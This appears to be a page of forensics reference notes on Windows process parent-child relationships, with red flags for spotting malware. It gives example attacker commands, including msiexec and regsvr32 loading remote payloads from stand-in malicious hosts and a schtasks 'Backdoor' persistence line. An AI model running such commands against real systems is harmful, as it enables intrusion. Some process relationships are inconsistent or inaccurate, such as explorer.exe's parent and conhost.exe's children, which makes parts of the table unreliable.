🔹 Windows System Processes

Understanding parent-child process relationships is crucial for system monitoring, malware analysis, and forensic investigations. Here are some important processes and their typical parent-child

🔹 Windows System Processes

1️⃣ System Idle Process (PID 0)

  • Parent: None (it is created by the Windows kernel)

  • Child: None (does not spawn any processes)

  • Purpose: Represents unused CPU resources; does not execute code.

2️⃣ System Process (PID 4)

  • Parent: None (created by the Windows Kernel)

  • Child: Handles low-level kernel processes like drivers.

  • Purpose: Manages hardware interactions and kernel operations.

3️⃣ smss.exe (Session Manager Subsystem)

  • Parent: System (PID 4)

  • Child: winlogon.exe, csrss.exe

  • Purpose: Manages system sessions, initializes the registry, and starts critical system processes.

4️⃣ csrss.exe (Client/Server Runtime Subsystem)

  • Parent: smss.exe

  • Child: None

  • Purpose: Handles console windows, GUI elements, and thread creation.

5️⃣ wininit.exe (Windows Initialization Process)

  • Parent: smss.exe

  • Child: services.exe, lsass.exe

  • Purpose: Initializes system services during boot-up.

6️⃣ services.exe (Service Control Manager)

  • Parent: wininit.exe

  • Child: Various Windows services (svchost.exe, spoolsv.exe, etc.)

  • Purpose: Manages Windows services.

7️⃣ lsass.exe (Local Security Authority Subsystem)

  • Parent: wininit.exe

  • Child: None (but can be targeted for credential dumping)

  • Purpose: Manages authentication and security policies.

8️⃣ explorer.exe (Windows Explorer)

  • Parent: winlogon.exe

  • Child: cmd.exe, notepad.exe, chrome.exe (user-launched apps)

  • Purpose: Provides the desktop, taskbar, and file browsing interface.

9️⃣ cmd.exe (Command Prompt)

  • Parent: explorer.exe (when opened by a user)

  • Child: powershell.exe, whoami.exe, etc.

  • Purpose: Runs command-line instructions.

🔟 powershell.exe

  • Parent: cmd.exe or explorer.exe

  • Child: Various scripts or executables.

  • Purpose: Executes PowerShell scripts and commands.

1️⃣1️⃣ rundll32.exe

  • Parent: explorer.exe, cmd.exe

  • Child: Can execute malicious DLLs if misused.

  • Purpose: Loads and executes DLL files.

1️⃣2️⃣ wmiprvse.exe (WMI Provider Host)

  • Parent: services.exe

  • Child: Various WMI queries

  • Purpose: Executes WMI scripts for system management.

1️⃣3️⃣ taskhost.exe / taskhostw.exe

  • Parent: services.exe

  • Child: Hosts dynamic Windows services.

  • Purpose: Executes DLL-based services.

🔹 Additional Critical Windows Processes

1️⃣ winlogon.exe (Windows Logon Application)

  • Parent: smss.exe

  • Child: userinit.exe, explorer.exe

  • Purpose: Handles user login, logoff, and lock screen.

  • Red Flags: Malware can inject into winlogon.exe for persistence (e.g., Winlogon Registry Notification abuse).

2️⃣ userinit.exe

  • Parent: winlogon.exe

  • Child: explorer.exe, cmd.exe

  • Purpose: Runs after login, initializes user environment.

  • Red Flags: If replaced by malware, it can execute malicious scripts on login.

3️⃣ explorer.exe

  • Parent: userinit.exe

  • Child: User-launched apps (chrome.exe, notepad.exe, etc.)

  • Purpose: Handles the desktop, taskbar, and file browsing.

  • Red Flags: If explorer.exe spawns cmd.exe or powershell.exe, it could indicate script execution or malware activity.

4️⃣ msiexec.exe (Windows Installer)

  • Parent: explorer.exe or services.exe

  • Child: Can spawn installation processes.

  • Purpose: Handles the installation of .msi files.

  • Red Flags: Attackers can use msiexec.exe for LOLBin (Living Off the Land Binaries) execution (msiexec.exe /q /i http://malicious-url.com/malware.msi).

5️⃣ wscript.exe & cscript.exe (Windows Scripting Hosts)

  • Parent: explorer.exe, cmd.exe

  • Child: Script execution (.vbs, .js).

  • Purpose: Executes VBScript (wscript.exe) and command-line scripts (cscript.exe).

  • Red Flags: Often used by malware for fileless attacks.

6️⃣ rundll32.exe

  • Parent: explorer.exe, cmd.exe

  • Child: Loads DLLs.

  • Purpose: Executes functions in DLLs.

  • Red Flags: Attackers use it to execute malware-laden DLLs (rundll32.exe malware.dll, Start).

7️⃣ regsvr32.exe (Registry Server)

  • Parent: cmd.exe, explorer.exe

  • Child: Registers/Unregisters COM DLLs.

  • Purpose: Registers system DLLs.

  • Red Flags: Used in Squiblydoo Attack to bypass defenses (regsvr32 /s /n /u /i:http://malicious.com/file.sct scrobj.dll).

8️⃣ conhost.exe (Console Window Host)

  • Parent: cmd.exe, explorer.exe

  • Child: powershell.exe, notepad.exe

  • Purpose: Provides console window support.

  • Red Flags: If conhost is running in unusual locations (C:\Users\Public\conhost.exe), it might be malware.

9️⃣ dllhost.exe (COM Surrogate)

  • Parent: explorer.exe

  • Child: Handles DLL-based processes.

  • Purpose: Supports COM objects execution.

  • Red Flags: If running without an associated process, it may be malware (dllhost.exe used for Process Hollowing).

🔟 werfault.exe (Windows Error Reporting)

  • Parent: services.exe

  • Child: None (Handles error reporting).

  • Purpose: Collects error reports and crash dumps.

  • Red Flags: Attackers can disable werfault.exe to prevent crash reports from being logged.

1️⃣1️⃣ consent.exe (UAC Prompt)

  • Parent: winlogon.exe

  • Child: Elevates processes requiring Admin rights.

  • Purpose: Handles UAC prompts.

  • Red Flags: If bypassed, attackers can escalate privileges.

1️⃣2️⃣ taskeng.exe (Task Scheduler Engine)

  • Parent: services.exe

  • Child: Scheduled tasks.

  • Purpose: Executes scheduled tasks.

  • Red Flags: Used in persistence (schtasks.exe /create /tn Backdoor /tr "C:\malware.exe").

PreviousMaster File Table (MFT), NTFS, $LogFile, and $UsnJrnl: Forensics

Last updated